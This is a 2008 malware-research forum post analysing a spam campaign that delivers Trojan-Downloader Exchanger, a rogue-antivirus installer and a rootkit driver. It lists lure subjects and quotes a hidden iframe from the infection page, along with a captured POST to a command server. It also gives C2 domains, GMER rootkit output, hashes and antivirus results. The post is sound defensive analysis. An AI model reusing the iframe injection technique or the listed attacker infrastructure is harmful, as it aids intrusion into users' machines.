B.I.S.S. Forums > Trojan-Downloader.Win32.Exchanger.?? goes rootkit again

Full Version: Trojan-Downloader.Win32.Exchanger.?? goes rootkit again

B.I.S.S. Forums > Malware Research Forum > Malware Playground

Kimberly

Aug 1 2008, 12:16 AM

Commonly referred to as Trojan-Downloader.Win32.Exchanger, this huge spam campaign has being going on for months now and it's getting worse every day.
Some background details.

The topics below are linked to the same spam campaign.

Nov 22 2007, first sample on B.I.S.S.

The variety of subjects in the emails will guarantee a high impact since we find back news headlines based on recent events, free videos / pictures of stars, songs, orders, and even failure notices … Below are a few samples of today’s harvest.

Subject: Presentation shocking for [username]
Body: Veronika Zemanova Shocking sexy songs

Subject: IBM to file for bankruptcy
Body: Bill Clinton finds Hillary affair pics

Subject: Interesting - Beat 360 Caption Contest Video
Body: Watch >>>

Subject: Look mpeg4 Gallery
Body: Kylie Minogue Shocking mpeg4.

Subject: Your order is executed
Body: Cameron Diaz Nude - Free Video

Subject: China has more interet users than US
Body: Thailand decides to cut off economic exchanges with Cambodia, putting possibility of war on the table

Subject: Your order
Body: T!t$ Photo and Video Angel!na Jolie

Subject: Failure notice for Gabriel
Body: Nicole Kidman N@ked - Video, Pictures

Subject: Virgin Galactic shows off mothership space craft
Body: New laws legalize gun ownership for teenagers in US

Subject: Timberlake gay video
Body: Watch >>>

Some pages contain exploits and others don't, some lead to a direct download of CbEvtSvc.exe while others directly link to the first file downloaded by CbEvtSvc.exe (see 31scan2.exe - 621253663.exe). Different methods, different files ... all have the same objective: get unwanted fraudware; mainly a fake / rogue antivirus; installed on your computer. Some go a lil' bit further ... reason of this write-up because we're talking rootkit now.

<h4>

The sample ...

</h4>
Today's mail will lead us to a site where we are prompted to install a Flash update.

The page contains an iframe.

CODE
<iframe id="ifid01" src="metai.html" frameborder="0" style="display:none"></iframe>

This iframe redirects us to 1.html which contains a huge list of exploits as seen in the recent storm variants with the exception of the Baidu Bar.

The "usual suspects" ...
SuperBuddy ActiveX
NCTAudioFile2
GomWebCtrl.GomManager.1
RealPlayer
WebviewFolderIcon.WebviewFolderIcon.1

Details on those storm exploits can be found here.

The next stage consists of downloading get_flash_update.exe which will be saved as wXtwRzv.exe on our computer. Upon excution the file is copied to the %system% folder as CbEvtSvc.exe. A new service is created on our system, visible in Hijackthis as follows.

O23 - Service: CbEvtSvc - Unknown owner - C:\WINDOWS\System32\CbEvtSvc.exe

Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

After a couple of minutes internet access is requested by CbEvtSvc.exe. The established link is used to post information about OS version, geo location etc ... and to retreive a list of files to download.

<h4>

31scan2.exe aka 6212533663.exe

</h4>
A first file called 31scan2.exe and saved as 6212533663.exe is downloaded and executed on the computer.

A quick check is done as it gathers information about the operating system, processor, installed programs, environment variables ... This file will download and install a fake / rogue antivirus on the computer.

<h4>

install.exe aka 728739263.exe

</h4>
A second file - install.exe - is downloaded and saved as 728739263.exe

A random named kernel-mode driver will be dropped and installed. %System%\drivers\ef9f7dfb.sys in my case.
A new memory page is created in the address space of %System%\services.exe
Internet access is requested.

A DNS lookup on the following domains is performed. Capability to send out email message(s) with the built-in SMTP client engine.

google.com
yahoo.com
aol.com
microsoft.com

Data is posted back to the following domains.

208.72.168.191
davis-service.org
davis-service.asia
invtoworld.info
invtoworld.biz
satisfiedinvestors.com

CODE
POST /login.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 208.72.168.191
Content-Type: multipart/form-data
Content-Encoding: gzip
Content-Length: 96
~~~~~~~~~~: ~~~~~
Pragma: no-cache

Rootkit scan (Simple Mode)

</h4>.

QUOTE
GMER 1.0.14.14536 - http://www.gmer.net
Rootkit scan 2008-07-31 20:23:31
Windows 5.1.2600 Service Pack 2

---- System - GMER 1.0.14 ----

SSDT \SystemRoot\System32\Drivers\Beep.SYS (BEEP Driver/Microsoft Corporation) ZwCreateEvent [0xF4509E31]
SSDT \SystemRoot\System32\Drivers\Beep.SYS (BEEP Driver/Microsoft Corporation) ZwCreateKey [0xF4508005]
SSDT \SystemRoot\System32\Drivers\Beep.SYS (BEEP Driver/Microsoft Corporation) ZwOpenKey [0xF45080B9]

---- Kernel code sections - GMER 1.0.14 ----

.text Beep.SYS F4500300 62 Bytes [ 51, 20, 50, 8B, 9A, E9, CA, ... ]
.text Beep.SYS F450033F 175 Bytes [ EE, C1, E7, 1F, E3, CA, 8E, ... ]
.text Beep.SYS F45003EF 120 Bytes [ 00, D5, 83, 7C, 57, 2E, EB, ... ]
.text Beep.SYS F4500468 55 Bytes [ 2F, 0C, 8A, AA, F0, FC, 7A, ... ]

---- Kernel IAT/EAT - GMER 1.0.14 ----

IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!MmLockPagableDataSection] 440FE103
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeCancelTimer] AC757514
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!MmUnlockPagableImageSection] 3F521D69
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoStartNextPacket] CF153B12
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeSetTimer] 6E77F35F
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!_allmul] 9CD540E0
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoStartPacket] 14A64865
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeInitializeEvent] 97C401FE
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeInitializeTimer] 0FD385FB
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeInitializeDpc] 70178DEC
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoCreateDevice] 2D0BF9A1
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!RtlInitUnicodeString] EB03682A
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoAcquireCancelSpinLock] F21F34D7
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeRemoveDeviceQueue] 389B6838
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!KeRemoveEntryDeviceQueue] 468E6D1D
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoReleaseCancelSpinLock] 29FB9996
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IoDeleteDevice] 11D3DBF3
IAT \SystemRoot\System32\Drivers\Beep.SYS[ntoskrnl.exe!IofCompleteRequest] 162D1BC4
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!ExReleaseFastMutex] 4534AA31
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!KfRaiseIrql] 63591AFA
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!KfLowerIrql] 927EF2E7
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!HalMakeBeep] 28FA5E88
IAT \SystemRoot\System32\Drivers\Beep.SYS[HAL.dll!ExAcquireFastMutex] 21EA7CAD

---- Devices - GMER 1.0.14 ----

Device \FileSystem\Ntfs \Ntfs Beep.SYS (BEEP Driver/Microsoft Corporation)

AttachedDevice \Driver\Tcpip \Device\Ip Beep.SYS (BEEP Driver/Microsoft Corporation)
AttachedDevice \Driver\Tcpip \Device\Tcp Beep.SYS (BEEP Driver/Microsoft Corporation)
AttachedDevice \Driver\Tcpip \Device\Udp Beep.SYS (BEEP Driver/Microsoft Corporation)
AttachedDevice \Driver\Tcpip \Device\RawIp Beep.SYS (BEEP Driver/Microsoft Corporation)

Device \Driver\SYMTDI \Device\SymTDI Beep.SYS (BEEP Driver/Microsoft Corporation)

---- Services - GMER 1.0.14 ----

Service System32\drivers\ef9f7dfb.sys (*** hidden *** ) [SYSTEM] ef9f7dfb

---- Registry - GMER 1.0.14 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@ImagePath \SystemRoot\System32\drivers\ef9f7dfb.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@Start 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\ef9f7dfb@ErrorControl 1

---- EOF - GMER 1.0.14 ----

SymTDI is the Norton Internet Security filter, the rootkit "intercepts" the firewall filtering.

Note: Beep.sys has NOT been replaced by the rootkit.

<h4>

File details

</h4>
Filename: get_flash_update.exe

File size: 74752 bytes
MD5...: 57c23fe6897e77080eb610e89719522b
SHA1..: d64e1aba1264cc1c20d13d0f612c6cbf44bc18be
SHA256: 24d4df8ef81c55020d71e4e3bce900d4633a02fe07ed91c409875bbb394e5c4e

QUOTE
File get_flash_update.exe received on 07.31.2008 21:03:11 (CET)
AhnLab-V3 2008.7.29.1 2008.07.31 -
AntiVir 7.8.1.15 2008.07.31 TR/Dldr.Agent.yhp
Authentium 5.1.0.4 2008.07.31 -
Avast 4.8.1195.0 2008.07.31 -
AVG 8.0.0.156 2008.07.31 I-Worm/Nuwar.W
BitDefender 7.2 2008.07.31 -
CAT-QuickHeal 9.50 2008.07.31 TrojanDownloader.Agent.yhp
ClamAV 0.93.1 2008.07.31 -
DrWeb 4.44.0.09170 2008.07.31 Trojan.DownLoad.3252
eSafe 7.0.17.0 2008.07.29 Suspicious File
eTrust-Vet 31.6.5997 2008.07.31 -
Ewido 4.0 2008.07.31 -
F-Prot 4.4.4.56 2008.07.31 -
F-Secure 7.60.13501.0 2008.07.31 Trojan-Downloader.Win32.Agent.yhp
Fortinet 3.14.0.0 2008.07.31 -
GData 2.0.7306.1023 2008.07.31 Trojan-Downloader.Win32.Agent.yhp
Ikarus T3.1.1.34.0 2008.07.31 Trojan-Downloader.Win32.Agent.yhp
Kaspersky 7.0.0.125 2008.07.31 Trojan-Downloader.Win32.Agent.yhp
McAfee 5351 2008.07.31 -
Microsoft 1.3704 2008.07.28 -
NOD32v2 3315 2008.07.31 -
Norman 5.80.02 2008.07.31 W32/Tibs.CQFT
Panda 9.0.0.4 2008.07.31 -
PCTools 4.4.2.0 2008.07.31 -
Prevx1 V2 2008.07.31 Malicious Software
Rising 20.55.32.00 2008.07.31 -
Sophos 4.31.0 2008.07.31 Mal/EncPk-DA
Sunbelt 3.1.1537.1 2008.07.29 -
Symantec 10 2008.07.31 Trojan.Erotpics
TheHacker 6.2.96.391 2008.07.31 -
TrendMicro 8.700.0.1004 2008.07.31 Possible_Nucrp-6
VBA32 3.12.8.1 2008.07.31 -
ViRobot 2008.7.31.1319 2008.07.31 Spyware.Agent.Do.74752.A
VirusBuster 4.5.11.0 2008.07.31 Trojan.DL.Exchanger.BR
Webwasher-Gateway 6.6.2 2008.07.31 Trojan.Dldr.Agent.yhp

______________________________

Filename: 31scan2.exe - 6212533663.exe

Additional information
File size: 110080 bytes
MD5...: 627c1008e2f1f849160c9d58e238f080
SHA1..: 4ae33ad5a2095d31901b134eaab91f51568e3d60
SHA256: cc8847efd781a53d24f77fe3d2a1931ae3e0ca749d63fd93b8ece1a7b7955da0

QUOTE
File 31scan2.exe received on 07.31.2008 21:05:46 (CET)
AhnLab-V3 2008.7.29.1 2008.07.31 -
AntiVir 7.8.1.15 2008.07.31 HEUR/Crypted
Authentium 5.1.0.4 2008.07.31 -
Avast 4.8.1195.0 2008.07.31 -
AVG 8.0.0.156 2008.07.31 Downloader.FraudLoad.A
BitDefender 7.2 2008.07.31 -
CAT-QuickHeal 9.50 2008.07.31 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.07.31 -
DrWeb 4.44.0.09170 2008.07.31 -
eSafe 7.0.17.0 2008.07.29 Suspicious File
eTrust-Vet 31.6.5997 2008.07.31 -
Ewido 4.0 2008.07.31 -
F-Prot 4.4.4.56 2008.07.31 W32/Zhelatin.O.gen!Eldorado
F-Secure 7.60.13501.0 2008.07.31 -
Fortinet 3.14.0.0 2008.07.31 -
GData 2.0.7306.1023 2008.07.31 -
Ikarus T3.1.1.34.0 2008.07.31 -
Kaspersky 7.0.0.125 2008.07.31 -
McAfee 5351 2008.07.31 FakeAlert-AG.gen
Microsoft 1.3704 2008.07.28 -
NOD32v2 3315 2008.07.31 Win32/TrojanDownloader.Agent.OBK
Norman 5.80.02 2008.07.31 -
Panda 9.0.0.4 2008.07.31 -
PCTools 4.4.2.0 2008.07.31 -
Prevx1 V2 2008.07.31 Malicious Software
Rising 20.55.32.00 2008.07.31 -
Sophos 4.31.0 2008.07.31 Mal/TibsPk-D
Sunbelt 3.1.1537.1 2008.07.29 -
Symantec 10 2008.07.31 -
TheHacker 6.2.96.391 2008.07.31 -
TrendMicro 8.700.0.1004 2008.07.31 -
VBA32 3.12.8.1 2008.07.31 -
ViRobot 2008.7.31.1319 2008.07.31 -
VirusBuster 4.5.11.0 2008.07.31 -
Webwasher-Gateway 6.6.2 2008.07.31 Heuristic.Crypted

______________________________

Filename: install.exe - 728739263.exe

This is the rootkit installer ... a improved detection is really needed especially when looking at the Adware.AntivirXP08 detection made by ViRobot.

File size: 137216 bytes
MD5...: 831e11da49fee6b692d009b8f71822cf
SHA1..: 8d67c41fdf68dcff9d8a63caaba3a427399205f8
SHA256: 606e20d2f02da5732a8332c1271c8e503567f4e98889af29c287e0a0e8070b53
PEiD..: - UPX 2.90 [LZMA]

QUOTE
File install.exe received on 07.31.2008 21:06:48 (CET)
AhnLab-V3 2008.7.29.1 2008.07.31 -
AntiVir 7.8.1.15 2008.07.31 TR/Agent.137216.2.A
Authentium 5.1.0.4 2008.07.31 -
Avast 4.8.1195.0 2008.07.31 Win32:Trojan-gen {Other}
AVG 8.0.0.156 2008.07.31 SHeur.BYGH
BitDefender 7.2 2008.07.31 -
CAT-QuickHeal 9.50 2008.07.31 -
ClamAV 0.93.1 2008.07.31 -
DrWeb 4.44.0.09170 2008.07.31 -
eSafe 7.0.17.0 2008.07.29 Suspicious File
eTrust-Vet 31.6.5997 2008.07.31 -
Ewido 4.0 2008.07.31 -
F-Prot 4.4.4.56 2008.07.31 -
F-Secure 7.60.13501.0 2008.07.31 -
Fortinet 3.14.0.0 2008.07.31 W32/MUTANT.EW!tr
GData 2.0.7306.1023 2008.07.31 Win32:Trojan-gen
Ikarus T3.1.1.34.0 2008.07.31 Virus.Win32.Trojan
Kaspersky 7.0.0.125 2008.07.31 -
McAfee 5351 2008.07.31 -
Microsoft 1.3704 2008.07.28 -
NOD32v2 3315 2008.07.31 -
Norman 5.80.02 2008.07.31 -
Panda 9.0.0.4 2008.07.31 -
PCTools 4.4.2.0 2008.07.31 -
Prevx1 V2 2008.07.31 Malicious Software
Rising 20.55.32.00 2008.07.31 -
Sophos 4.31.0 2008.07.31 -
Sunbelt 3.1.1537.1 2008.07.29 -
Symantec 10 2008.07.31 -
TheHacker 6.2.96.391 2008.07.31 -
TrendMicro 8.700.0.1004 2008.07.31 TROJ_MUTANT.EW
VBA32 3.12.8.1 2008.07.31 -
ViRobot 2008.7.31.1319 2008.07.31 Adware.AntivirXP08.R.137216
VirusBuster 4.5.11.0 2008.07.31 -
Webwasher-Gateway 6.6.2 2008.07.31 Trojan.Agent.137216.2.A

______________________________

Filename: ef9f7dfb.sys

File size: 109762 bytes
MD5...: fc5be1b115c13c707ad8f33d8411be51
SHA1..: d4aeecdd0943c91d7e1c08b6f5f796202a6c4a36
PEiD..: -

QUOTE
File ef9f7dfb.sys received on 08.01.2008 02:19:33 (CET)
AhnLab-V3 2008.7.29.1 2008.07.31 Win-Trojan/Rootkit.109762
AntiVir 7.8.1.15 2008.07.31 -
Authentium 5.1.0.4 2008.07.31 -
Avast 4.8.1195.0 2008.07.31 -
AVG 8.0.0.156 2008.07.31 I-Worm/Nuwar.W
BitDefender 7.2 2008.08.01 Trojan.Rootkit.Rustock.E
CAT-QuickHeal 9.50 2008.07.31 -
ClamAV 0.93.1 2008.07.31 -
DrWeb 4.44.0.09170 2008.07.31 -
eSafe 7.0.17.0 2008.07.29 -
eTrust-Vet 31.6.5999 2008.07.31 -
Ewido 4.0 2008.07.31 -
F-Prot 4.4.4.56 2008.07.31 -
F-Secure 7.60.13501.0 2008.08.01 Trojan.Win32.Multis.cp
Fortinet 3.14.0.0 2008.07.31 W32/Tibs
GData 2.0.7306.1023 2008.07.31 Trojan.Win32.Multis.cp
Ikarus T3.1.1.34.0 2008.08.01 Virus.Trojan.Win32.Multis.cp
Kaspersky 7.0.0.125 2008.08.01 Trojan.Win32.Multis.cp
McAfee 5351 2008.07.31 W32/Nuwar.sys
Microsoft 1.3704 2008.07.28 -
NOD32v2 3316 2008.07.31 Win32/Rustock.NFW
Norman 5.80.02 2008.07.31 -
Panda 9.0.0.4 2008.08.01 -
PCTools 4.4.2.0 2008.07.31 -
Prevx1 V2 2008.08.01 Malicious Software
Rising 20.55.32.00 2008.07.31 -
Sophos 4.31.0 2008.08.01 Troj/NtRootK-DS
Sunbelt 3.1.1537.1 2008.08.01 Backdoor.Rustock
Symantec 10 2008.08.01 Hacktool.Rootkit
TheHacker 6.2.96.391 2008.07.31 -
TrendMicro 8.700.0.1004 2008.07.31 -
VBA32 3.12.8.2 2008.07.31 -
ViRobot 2008.7.31.1319 2008.07.31 -
VirusBuster 4.5.11.0 2008.07.31 -
Webwasher-Gateway 6.6.2 2008.07.31 -

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.